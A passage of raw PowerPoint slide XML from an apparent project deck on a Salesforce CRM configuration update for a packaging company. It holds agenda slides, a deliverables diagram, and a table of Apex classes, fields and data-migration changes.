              <a:rPr lang="en-US" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t>document</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7190" name="Text Box 78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5791200"/>
            <a:ext cx="14128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/>
              <a:t>Deliverables :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7191" name="Line 79"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="5791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92" name="Line 80"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="6248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93" name="Text Box 81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4635500" y="5791200"/>
            <a:ext cx="132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900"/>
              <a:t>Code (triggers,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t>classes, test methods)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7194" name="Text Box 83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-28575" y="139065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1400" b="1"/>
              <a:t>When</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7195" name="Text Box 84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="20637" y="4668838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1400" b="1"/>
              <a:t>Who</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7196" name="Text Box 85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-3969" y="5863432"/>
            <a:ext cx="617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1400" b="1"/>
              <a:t>What</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7197" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="25400" y="29654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 eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>How</a:t>
            </a:r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228600" y="0"/>
            <a:ext cx="8229600" cy="1096963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="39688" indent="-39688">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spec / PAD Dev&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7199" name="AutoShape 74"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="29718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0" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6208713" y="3505200"/>
            <a:ext cx="99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900"/>
              <a:t> Deliverables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t> Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7201" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="22860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202" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6553200"/>
            <a:ext cx="992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900"/>
              <a:t>Documentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7203" name="AutoShape 78"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3543300" y="57531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4" name="AutoShape 79"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4991100" y="57531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5" name="AutoShape 80"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6438900" y="57531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6" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="6553200"/>
            <a:ext cx="795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900"/>
              <a:t>Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7207" name="Text Box 76"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6056313" y="6553200"/>
            <a:ext cx="954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900"/>
              <a:t>Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123906" name="Picture 2" descr="http://leadtail.com/wp-content/uploads/2014/08/content-developmen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3429000"/>
            <a:ext cx="1143000" cy="986639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123908" name="Picture 4" descr="https://camo.githubusercontent.com/c88d430d33f6bd8d50d7eab78edb909eba0a2909/687474703a2f2f77656172656d6176656e732e636f6d2f696d616765732f6d6d2f636f64655f332e706e6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3505200"/>
            <a:ext cx="1287369" cy="7683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905000" y="2251075"/>
            <a:ext cx="51863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GB" sz="2400"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="240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GB" sz="2400">
                <a:ea typeface="Gulim"/>
                <a:cs typeface="Gulim"/>
              </a:rPr>
              <a:t>Planning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="240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GB" sz="2400"/>
              <a:t>Development summary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Development Detail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49157" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1471613" y="2397125"/>
            <a:ext cx="361950" cy="3097213"/>
            <a:chOff x="905" y="776"/>
            <a:chExt cx="228" cy="1951"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49159" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="906" y="776"/>
              <a:ext cx="227" cy="22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1400" b="1"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49160" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="906" y="1350"/>
              <a:ext cx="227" cy="22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1400" b="1"/>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49161" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="905" y="1925"/>
              <a:ext cx="227" cy="22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1400" b="1"/>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49162" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="906" y="2500"/>
              <a:ext cx="227" cy="22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1400" b="1"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="49163" name="AutoShape 14"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="49159" idx="4"/>
              <a:endCxn id="49160" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1020" y="1011"/>
              <a:ext cx="0" cy="331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164" name="AutoShape 15"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="49160" idx="4"/>
              <a:endCxn id="49161" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1019" y="1585"/>
              <a:ext cx="1" cy="33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165" name="AutoShape 16"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="49161" idx="4"/>
              <a:endCxn id="49162" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1019" y="2160"/>
              <a:ext cx="1" cy="332"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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8225" y="1828800"/>
            <a:ext cx="8105775" cy="4919663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="284163" indent="-284163" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" smtClean="0"/>
              <a:t>Universal Container &amp; Packaging, LLC specializes in packaging, fulfilment and distribution, of virtually any type of retail and promotional merchandise, from customized packaging solutions and fulfilment to direct mail and promotional products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="500" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CRM has been upgraded with Salesforce Winter09 version. The platform provides new enhancements which can be leveraged to change CRM configuration with 2 objectives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669925" lvl="1" indent="-195263" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>Make the configuration simpler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669925" lvl="1" indent="-195263" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>Deploy new functionalities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669925" lvl="1" indent="-195263" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="500" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>AP12 will decrease the existing configuration, and facilitate maintenance. It will be deployed within CRM Build 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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Planning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51205" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1565275" y="2362200"/>
            <a:ext cx="6054725" cy="3048000"/>
            <a:chOff x="986" y="1488"/>
            <a:chExt cx="3814" cy="1920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="51206" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="986" y="1488"/>
              <a:ext cx="3814" cy="1920"/>
              <a:chOff x="748" y="1025"/>
              <a:chExt cx="4990" cy="2881"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5120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1048"/>
                <a:ext cx="4990" cy="2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09" name="Rectangle 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="770" y="1025"/>
                <a:ext cx="4850" cy="27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  <a:buFontTx/>
                  <a:buChar char="»"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" sz="1400" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51207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8"/>
              <a:ext cx="3693" cy="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Development Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="112688" name="Group 48"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="1785938"/>
          <a:ext cx="6985000" cy="4639056"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1179513"/>
                <a:gridCol w="5805487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 AP05 / AP08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 / Quote__c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Update child records : techField__c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Remove AP05 and AP08 as it will be managed through configuration</a:t>
                      </a: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AP06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Account / Opportunity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Update child records : AccountRepresentative__c and AccountOwner__c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New field BatchOwnerUpdated__c, DateTime</a:t>
                      </a:r>
                      <a:b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Data migration to keep previous flagged records</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="fr-F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Enable the Opportunity.ByPassRules__c usage</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-IE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AP07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OpportunitySet__c / Opportunity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Update child records : OpportunitySet_Owner__c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New field BatchAPIOwnerUpdated__c + data migration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Define APIByPassRules__c on child records</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-IE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OpportunitySet__c / Opportuntiy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Update child records : MainUser__c, AccountOwner__c, CountryOfDestination__c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New field BatchAPIMainUserUpdated__c + data migration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Define APIByPassRules__c on child records</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-I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AP12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Quote__c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Prevent from deleting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Create trigger and remove fields Nb_of_Service__c + Nb_of_Products__c</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-IE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APP421101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OpportunitySet__c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Remove Apex code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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-IE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Has a partial behaviour as AP09. Triggered under the same conditions, but doesn’t propagate an empty OpportunitySet.MainUser to the Opportunity.MainUser, and doesn’t empty Opportunity.MainUser if Opportunity.OpportunitySet is defined to null.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Decomissioning</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-IE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Change Owner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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-IE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Add 4 values to the Profile conversion table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AP03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E6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Object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Opportunity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fr-FR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What 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 :	Sharings computation</a:t>
                      </a:r>
                      <a:b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</a:b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 </a:t>
                      </a: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Changes :</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="fr-F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	 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-IE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Correct the bad behaviour on line 106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CRM Data Model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42913" y="1509713"/>
            <a:ext cx="79311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4163" indent="-284163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01800" algn="l"/>
                <a:tab pos="2060575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:ea typeface="Gulim"/>
                <a:cs typeface="Gulim"/>
              </a:rPr>
              <a:t>Reminder on the Data Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:ea typeface="Gulim"/>
              <a:cs typeface="Gulim"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53254" name="Group 136"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2209800"/>
            <a:ext cx="7391400" cy="4249738"/>
            <a:chOff x="528" y="1296"/>
            <a:chExt cx="4656" cy="2677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53255" name="Group 44"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="1296"/>
              <a:ext cx="4656" cy="2677"/>
              <a:chOff x="725" y="1025"/>
              <a:chExt cx="4990" cy="2859"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="53345" name="Picture 4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" y="1026"/>
                <a:ext cx="4990" cy="2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346" name="Rectangle 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="770" y="1025"/>
                <a:ext cx="4850" cy="27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  <a:buFontTx/>
                  <a:buChar char="»"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" sz="1400" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="53256" name="AutoShape 47"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53336" idx="2"/>
              <a:endCxn id="53332" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3108" y="2103"/>
              <a:ext cx="1" cy="2914"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 14300005"/>
              </a:avLst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57" name="AutoShape 48"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53334" idx="3"/>
              <a:endCxn id="53332" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3250" y="3514"/>
              <a:ext cx="9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58" name="AutoShape 49"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53333" idx="0"/>
              <a:endCxn id="53322" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="2673" y="3287"/>
              <a:ext cx="1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59" name="AutoShape 50"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53344" idx="3"/>
              <a:endCxn id="53324" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2139" y="2964"/>
              <a:ext cx="1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60" name="AutoShape 51"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53338" idx="1"/>
              <a:endCxn id="53324" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="3250" y="2964"/>
              <a:ext cx="24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61" name="AutoShape 52"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53338" idx="3"/>
              <a:endCxn id="53262" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4173" y="2578"/>
              <a:ext cx="93" cy="38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62" name="Oval 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4220" y="2504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3" name="Oval 54"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2478" y="265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4" name="Oval 55"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4356" y="2170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5" name="Oval 56"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4378" y="227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6" name="Oval 57"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3086" y="3113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7" name="Oval 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4378" y="2419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8" name="Oval 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1904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69" name="Oval 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4678" y="3491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270" name="AutoShape 61"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53332" idx="3"/>
              <a:endCxn id="53269" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4724" y="3514"/>
              <a:ext cx="182" cy="51"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -79120"/>
                <a:gd name="adj2" fmla="val 37058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71" name="Oval 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4333" y="2493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272" name="AutoShape 63"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53331" idx="0"/>
              <a:endCxn id="53267" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="4059" y="2869"/>
              <a:ext cx="924" cy="9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73" name="AutoShape 64"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="53336" idx="1"/>
              <a:endCxn id="53268" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="1006" y="1978"/>
              <a:ext cx="158" cy="153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74" name="Oval 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
